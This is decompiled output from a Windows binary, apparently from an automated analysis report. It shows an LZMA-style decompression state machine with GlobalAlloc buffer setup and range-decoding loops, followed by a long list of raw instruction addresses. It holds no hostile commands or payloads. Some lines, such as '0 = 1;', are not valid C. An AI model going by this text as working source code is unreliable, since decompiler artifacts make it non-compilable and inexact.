											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406333
0x00406333
0x00406338
0x004063af
0x004063b6
0x004063c0
0x0040699f
0x0040699f
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00406a15
0x00406a15
0x00406a1b
0x00406a1b
0x00000000
0x004069f0
0x004069f0
0x004069f4
0x00406ba3
0x00000000
0x00406ba3
0x00406a00
0x00406a07
0x00406a0f
0x00406a12
0x00000000
0x00406a12
0x0040633a
0x0040633a
0x0040633e
0x00406346
0x00406349
0x0040634b
0x0040634e
0x00406350
0x00406355
0x00406358
0x0040635f
0x00406366
0x00406369
0x00406374
0x0040637c
0x0040637c
0x00406376
0x00406376
0x00406376
0x0040636b
0x0040636b
0x0040636b
0x00406383
0x004063a1
0x004063a3
0x00406576
0x00406576
0x00406579
0x0040657c
0x0040657f
0x00406582
0x00406585
0x00406588
0x0040658b
0x0040658e
0x00406594
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b5
0x004065b8
0x004065be
0x00406596
0x00406596
0x0040659e
0x004065a3
0x004065a5
0x004065a7
0x004065a7
0x004065c8
0x004065cb
0x0040656e
0x00406574
0x00000000
0x00000000
0x00000000
0x004065cd
0x00406549
0x0040654d
0x00406b55
0x00000000
0x00406b55
0x00406553
0x00406556
0x00406559
0x0040655d
0x00406560
0x00406566
0x00406568
0x00406568
0x0040656b
0x00000000
0x0040656b
0x00406385
0x00406385
0x00406388
0x0040638e
0x00406390
0x00406390
0x00406393
0x00406396
0x00406398
0x00406399
0x0040639c
0x00406409
0x00406409
0x0040640d
0x00406410
0x00406413
0x00406416
0x00406419
0x0040641a
0x0040641d
0x0040641f
0x00406425
0x00406428
0x0040642b
0x0040642e
0x00406431
0x00406437
0x00406453
0x00406456
0x00406459
0x0040645c
0x00406463
0x00406469
0x0040646d
0x00406439
0x00406439
0x0040643d
0x00406445
0x0040644a
0x0040644c
0x0040644e
0x0040644e
0x00406477
0x0040647a
0x004063f1
0x004063f1
0x004063f7
0x004064aa
0x004064b0
0x00000000
0x00000000
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064c1
0x004064c4
0x004064c7
0x004064ca
0x004064d0
0x004064e8
0x004064eb
0x004064ee
0x004064f1
0x004064f1
0x004064f4
0x004064fa
0x004064d2
0x004064d2
0x004064da
0x004064df
0x004064e1
0x004064e3
0x004064e3
0x00406504
0x00406507
0x00406485
0x00406489
0x00406b49
0x00000000
0x00406b49
0x0040648f
0x00406492
0x00406495
0x00406499
0x0040649c
0x004064a2
0x004064a4
0x004064a4
0x004064a7
0x004064a7
0x00406507
0x0040650e
0x0040650e
0x0040650e
0x00406512
0x00406512
0x00406515
0x00406518
0x0040651c
0x00406b61
0x00000000
0x00406b61
0x00406522
0x00406525
0x00406528
0x0040652b
0x0040652e
0x00406531
0x00406534
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406541
0x00406541
0x00406541
0x004066de
0x004066de
0x004066e1
0x004066e1
0x00000000
0x004066e1
0x00406403
0x00000000
0x00000000
0x00000000
0x00406480
0x004063cc
0x004063d0
0x00406b3d
0x00406bb9
0x00406bc1
0x00406bc8
0x00406bca
0x00406bd1
0x00406bd5
0x00406bd5
0x004063d6
0x004063d9
0x004063dc
0x004063e0
0x004063e3
0x004063e9
0x004063eb
0x004063eb
0x004063ee
0x00000000
0x004063ee
0x0040647a
0x00406383
0x004061b7
0x004061b7
0x004061c0
0x00406bce
0x00406bce
0x00000000
0x00406bce
0x004061c6
0x00000000
0x004061d1
0x00000000
0x00000000
0x004061da
0x004061dd
0x004061e0
0x004061e4
0x00000000
0x00000000
0x004061ea
0x004061ed
0x004061ef
0x004061f0
0x004061f3
0x004061f5
0x004061f6
0x004061f8
0x004061fb
0x00406200
0x00406205
0x0040620e
0x00406221
0x00406224
0x00406230
0x00406258
0x0040625a
0x00406268
0x00406268
0x0040626c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040625c
0x0040625c
0x0040625f
0x00406260
0x00406260
0x00000000
0x0040625c
0x00406236
0x0040623b
0x0040623b
0x00406244
0x0040624c
0x0040624f
0x00000000
0x00406255
0x00406255
0x00000000
0x00406255
0x00000000
0x00406272
0x00406272
0x00406276
0x00406b22
0x00000000
0x00406b22
0x0040627f
0x0040628f
0x00406292
0x00406295
0x00406295
0x00406295
0x00406298
0x0040629c
0x00000000
0x00000000
0x0040629e
0x004062a4
0x004062ce
0x004062d4
0x004062db
0x00000000
0x004062db
0x004062aa
0x004062ad
0x004062b2
0x004062b2
0x004062bd
0x004062c5
0x004062c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040630d
0x00406313
0x00406316
0x00406323
0x0040632b
0x00000000
0x00000000
0x004062e2
0x004062e2
0x004062e6
0x00406b31
0x00000000
0x00406b31
0x004062f2
0x004062fd
0x004062fd
0x004062fd
0x00406300
0x00406303
0x00406306
0x0040630b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004065d2
0x004065d6
0x004065f4
0x004065f7
0x004065fe
0x00406601
0x00406604
0x00406607
0x0040660a
0x0040660d
0x0040660f
0x00406616
0x00406617
0x00406619
0x0040661c
0x0040661f
0x00406622
0x00406622
0x00406627
0x00000000
0x00406627
0x004065d8
0x004065db
0x004065de
0x004065e8
0x00000000
0x00000000
0x0040663c
0x00406640
0x00406663
0x00406666
0x00406669
0x00406673
0x00406642
0x00406642
0x00406645
0x00406648
0x0040664b
0x00406658
0x0040665b
0x0040665b
0x00000000
0x00000000
0x0040667f
0x00406683
0x00000000
0x00000000
0x00406689
0x0040668d
0x00000000
0x00000000
0x00406693
0x00406695
0x00406699
0x00406699
0x0040669c
0x004066a0
0x00000000
0x00000000
0x004066f0
0x004066f4
0x004066fb
0x004066fe
0x00406701
0x0040670b
0x00000000
0x0040670b
0x004066f6
0x00000000
0x00000000
0x00406717
0x0040671b
0x00406722
0x00406725
0x00406728
0x0040671d
0x0040671d
0x0040671d
0x0040672b
0x0040672e
0x00406731
0x00406731
0x00406734
0x00406737
0x0040673a
0x0040673a
0x0040673d
0x00406744
0x00406749
